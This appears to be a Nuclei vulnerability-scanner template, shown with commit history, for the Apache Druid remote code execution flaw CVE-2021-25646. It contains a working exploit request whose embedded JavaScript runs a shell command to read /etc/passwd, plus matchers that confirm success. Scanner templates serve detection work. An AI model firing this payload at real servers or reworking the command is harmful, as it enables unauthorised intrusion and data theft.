nuclei-templates/http/cves/2021/CVE-2021-25646.yaml

88 lines
2.5 KiB
YAML
Raw Normal View History

2021-02-03 09:24:49 +00:00
id: CVE-2021-25646
info:
name: Apache Druid - Remote Code Execution
2021-02-03 09:24:49 +00:00
author: pikpikcu
severity: high
2021-02-03 09:24:49 +00:00
description: |
Apache Druid is susceptible to remote code execution because by default it lacks authorization and authentication. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
reference:
- https://paper.seebug.org/1476/
- https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E
- http://www.openwall.com/lists/oss-security/2021/01/29/6
- https://lists.apache.org/thread.html/r64431c2b97209f566b5dff92415e7afba0ed3bfab4695ebaa8a62e5d@%3Cdev.druid.apache.org%3E
- https://nvd.nist.gov/vuln/detail/CVE-2021-25864
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-25646
cwe-id: CWE-732
tags: cve,cve2021,apache,rce,druid
2021-02-03 09:24:49 +00:00
http:
2021-02-03 09:24:49 +00:00
- raw:
- |
POST /druid/indexer/v1/sampler HTTP/1.1
2021-02-03 09:24:49 +00:00
Host: {{Hostname}}
Content-Type: application/json
2021-06-30 14:58:41 +00:00
{
"type":"index",
"spec":{
"ioConfig":{
"type":"index",
"firehose":{
"type":"local",
"baseDir":"/etc",
"filter":"passwd"
}
},
"dataSchema":{
"dataSource":"odgjxrrrePz",
"parser":{
"parseSpec":{
"format":"javascript",
"timestampSpec":{
2021-06-30 15:01:15 +00:00
2021-06-30 14:58:41 +00:00
},
"dimensionsSpec":{
2021-06-30 15:01:15 +00:00
2021-06-30 14:58:41 +00:00
},
"function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}",
"":{
"enabled":"true"
}
}
}
}
},
"samplerConfig":{
"numRows":10
}
}
2021-02-03 16:12:03 +00:00
2021-02-03 09:24:49 +00:00
matchers-condition: and
matchers:
2022-06-28 02:45:17 +00:00
- type: regex
part: body
regex:
- "root:.*:0:0:"
2021-06-30 14:58:41 +00:00
- type: word
2022-06-28 02:45:17 +00:00
part: body
2021-06-30 14:58:41 +00:00
words:
2021-02-03 09:24:49 +00:00
- "numRowsRead"
2021-02-03 16:12:03 +00:00
- "numRowsIndexed"
2021-03-10 14:03:49 +00:00
condition: and
2021-06-30 14:58:41 +00:00
2022-06-28 02:45:17 +00:00
- type: word
part: header
words:
- "application/json"
2022-06-28 02:45:17 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27